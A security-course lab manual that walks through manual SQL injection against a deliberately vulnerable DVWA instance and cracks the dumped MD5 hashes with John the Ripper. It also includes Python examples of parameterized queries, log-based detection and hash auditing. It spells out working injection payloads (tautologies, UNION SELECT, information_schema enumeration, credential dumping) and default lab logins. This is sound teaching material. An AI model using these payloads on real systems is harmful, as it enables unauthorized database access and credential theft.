Lab 7: Manual SQL Injection, John the Ripper

Contents
I. Background Information
II. Virtual Machine Settings
III. Manual SQL Injection
IV. Create Password Hash File
V. Proof of Lab Using John the Ripper

I. Background Information
1. What is Damn Vulnerable Web App (DVWA)?

- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications, and aid teachers/students to teach/learn web application security in a classroom environment.

2. What is a SQL Injection?

- SQL injection (also known as SQL fishing) is a technique often used to attack data-driven applications.
- This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
- The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or user input is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

3. What is SQL Injection Harvesting?

- SQL Injection Harvesting is where a malicious user supplies SQL statements to render sensitive data such as usernames, passwords, database tables, and more.

Lab Notes

In this lab we will do the following:

- We will inject always-true SQL statements into the SQL Injection User ID field with security set to low.
- We will obtain the username and raw-MD5 password contents from the users table.
- We will use John the Ripper to crack the raw-MD5 password hash for each user.
II. Virtual Machine Settings
1. Login to Metasploitable2
- Start up VMware Workstation
- Select Metasploitable2
- Play virtual machine
Login: msfadmin
Password: msfadmin

Get IP Address: ifconfig eth0

2. Login to Kali
- Select Kali
- Play virtual machine
Login: root
Password: toor
Note: on Kali 2020 the login is kali/kali.

Start a Terminal Console: Applications --> Terminal.


Get IP Address: ifconfig -a
3. Login to DVWA
- Start up Firefox on Kali
- Place http://192.168.70.128/dvwa/login.php into the address bar. (Replace 192.168.70.128 with the Metasploitable IP address from II.1)
- Login: admin
- Password: password
- Click on login.

4. Set Security Level


Set DVWA Security Level:
- Click on DVWA Security, in the left hand menu
- Select “low”
- Click Submit

III. Manual SQL Injection


1. SQL Injection Menu:
Select “SQL Injection” from the left navigation menu.

2. Basic Injection
- Input “1” into the text box
- Click Submit
- Note: the webpage/code is supposed to print the ID, First name and Surname to the screen.
Notes (FYI): Below is the PHP select statement that we will be exploiting, specifically the unescaped $id variable.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

3. Always True Scenario


- Input the below text into the User ID Textbox (See Picture): %' or '0'='0
- Click Submit
Notes(FYI):
In this scenario we are saying: display all records that are false and all records that are true.
%' - Will probably not be equal to anything, and will be false.
'0'='0' - Is equal to true, because 0 will always equal 0.
Database Statement
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
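The query from step 2 and the always-true payload from this step, reproduced as an added Python example that is not part of the lab manual or of DVWA's own code. It uses an in-memory SQLite table with constructed rows standing in for DVWA's users table (SQLite is assumed in place of MySQL for portability; the comparison behaves the same for this query), and shows the same string splice the PHP performs next to the fix a developer would apply: binding the value as a parameter so it can never change the statement's structure.

```python
import sqlite3

# Constructed rows standing in for DVWA's users table (not the lab's real data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Alice", "Smith"),
    (3, "Bob", "Jones"),
]


def make_db():
    conn = sqlite3.connect(":memory:")  # SQLite assumed here in place of MySQL
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    # Same construction as the PHP $getid string: the raw input is spliced into
    # the SQL text, so a closing quote in the input ends the literal and the
    # rest of the input is parsed as SQL.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return query, conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    # Parameter binding: the statement text is fixed, the value travels
    # separately, and the whole input is compared as data (quotes, 'or' and all).
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return query, conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    for user_id in ("1", "%' or '0'='0"):
        for fn in (vulnerable_lookup, safe_lookup):
            q, rows = fn(conn, user_id)
            print(f"{fn.__name__:18} {q}")
            print(f"{'':18} -> {rows}")
```

With the input 1 both functions return the single admin row. With the always-true payload the spliced query returns every row, while the bound query returns nothing, because the database is asked whether any user_id equals the literal text of the payload, which none does.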
4. Display Database Version
- Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, version() #
- Click Submit
Notes(FYI):
Notice in the last displayed line, 5.1.60 is displayed in the surname.
This is the version of the mysql database.
5. Display Database User
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, user() #
Notes(FYI):
Notice in the last displayed line, root@localhost is displayed in the surname.
This is the name of the database user that executed the behind-the-scenes PHP code.
6. Display Database Name.
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, database() #
Notes(FYI):
Notice in the last displayed line, dvwa is displayed in the surname.
This is the name of the database.

7. Display all tables in information_schema.


- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables #
- Click Submit
Notes(FYI):
Now we are displaying all the tables in the information_schema database.
The INFORMATION_SCHEMA is the information database, the place that stores information
about all the other databases that the MySQL server maintains.

CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, guestbook, users, columns_priv, db, func, help_category, help_keyword, help_relation, help_topic, host, proc, procs

8. Display all the user tables in information_schema


- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
- Click Submit
Notes(FYI):
Now we are displaying all the tables that start with the prefix "user" in the information_schema
database.

9. Display all the column fields in the information_schema users table


- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(column_name) from information_schema.columns where table_name = 'users' #
- Click Submit
Notes(FYI):
Now we are displaying all the columns in the users table.
Notice the user_id, first_name, last_name, user and password columns.
10. Display all the column field contents in the users table
- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
- Click Submit
Notes(FYI):
Now we have successfully displayed all the necessary authentication information from this database.
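A detection-side counterpart to steps 3 through 10, added here as an example and not part of the lab: a small Python scanner that pulls the query string out of Apache-style access-log lines, URL-decodes the parameters and flags the injection patterns this lab exercises (a quoted always-true comparison, union select, references to information_schema and a trailing comment terminator). The log lines are constructed for illustration, and the /dvwa/vulnerabilities/sqli/ path is assumed; the rules are a starting point, not a complete ruleset.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache common format (not captured from the lab VM).
# The /dvwa/vulnerabilities/sqli/ path is assumed for illustration.
SAMPLE_LOG = """\
192.168.70.1 - - [10/Oct/2023:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321
192.168.70.1 - - [10/Oct/2023:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%270%27%3D%270&Submit=Submit HTTP/1.1" 200 5120
192.168.70.1 - - [10/Oct/2023:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 5200
192.168.70.1 - - [10/Oct/2023:10:00:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+table_name+from+information_schema.tables+%23&Submit=Submit HTTP/1.1" 200 9800
192.168.70.1 - - [10/Oct/2023:10:00:20 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1500
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status, size
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+|-)')

# Each rule is a name and a regex applied to a decoded parameter value.
RULES = [
    ("tautology", re.compile(r"'\s*or\s*'?\d'?\s*=\s*'?\d", re.I)),      # ' or '0'='0, ' or 0=0
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("comment-terminator", re.compile(r"(#|--\s|/\*)")),
]


def scan_line(line):
    """Return a finding dict for one log line, or None if no rule matched."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status, size = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes and turns '+' into spaces, so rules see the
    # payload as the database would.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = set()
    for name, values in params.items():
        for value in values:
            for rule, rx in RULES:
                if rx.search(value):
                    hits.add((name, rule))
    if not hits:
        return None
    return {"client": client, "time": ts, "path": parts.path, "hits": sorted(hits)}


def scan_log(text):
    """Scan every line of an access log and return the findings in order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["client"], finding["path"], finding["hits"])
```

The first and last sample lines produce no finding; the three payload lines are each attributed to the id parameter with the rules they trip. A production scanner would also decode a second time to catch double-encoded input and would tune the comment rule, since a bare '#' can occur in legitimate values.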
IV. Create Password Hash File
1. Create Password Hash File
Instructions:
1. Highlight both admin and the password hash
2. Right Click
3. Copy

2. Open Notepad
Instructions:
Applications --> Favorites --> Programs --> Text Editor
Paste in Notepad

3. Save in Notepad
Instructions:
1. Navigate to --> /pentest/passwords/john
2. Name the file name --> dvwa_password.txt
3. Click Save
V. Proof of Lab Using John the Ripper
Instructions:
1. Bring up a new terminal
2. cd Desktop
3. cat dvwa_password.txt
4. john --format=raw-MD5 dvwa_password.txt
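Why the john step works at all: DVWA stores unsalted raw MD5, so each guess costs a single hash computation and two users with the same password have identical hashes. The added Python example below is not the lab's or DVWA's code; it audits a user:hash file in the same layout as dvwa_password.txt for such entries and contrasts them with a salted, iterated PBKDF2 record (the algo$iterations$salt$digest layout is an assumption made here). The sample file and the passwords in it are constructed for the example, not the hash copied in the lab.

```python
import hashlib
import hmac
import os

HEX_DIGITS = set("0123456789abcdef")


def raw_md5(password: str) -> str:
    """Unsalted MD5 as DVWA stores it: the same input always gives the same 32-hex digest."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def looks_like_raw_md5(stored: str) -> bool:
    """Heuristic: a bare 32-character hex string carrying no salt or algorithm tag."""
    s = stored.strip().lower()
    return len(s) == 32 and set(s) <= HEX_DIGITS


def pbkdf2_store(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated hash in a self-describing 'algo$iters$salt$digest' string (layout assumed here)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def audit_hash_file(text: str) -> list:
    """Return the users in a 'user:hash' file whose stored value is unsalted MD5."""
    flagged = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, stored = line.split(":", 1)
        if looks_like_raw_md5(stored):
            flagged.append(user.strip())
    return flagged


def build_sample_file() -> str:
    """Constructed stand-in for dvwa_password.txt: two raw-MD5 users and one migrated user."""
    return "\n".join([
        f"admin:{raw_md5('password')}",
        f"alice:{raw_md5('password')}",        # same password, identical hash: no salt
        f"bob:{pbkdf2_store('password')}",     # same password, unique salted record
    ])


if __name__ == "__main__":
    sample = build_sample_file()
    print(sample)
    print("unsalted MD5 entries:", audit_hash_file(sample))
```

The audit flags admin and alice and not bob. Two PBKDF2 records for the same password differ because of the random salt, so a precomputed table of hashes is useless against them, and the iteration count makes each guess cost hundreds of thousands of hash operations instead of one.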
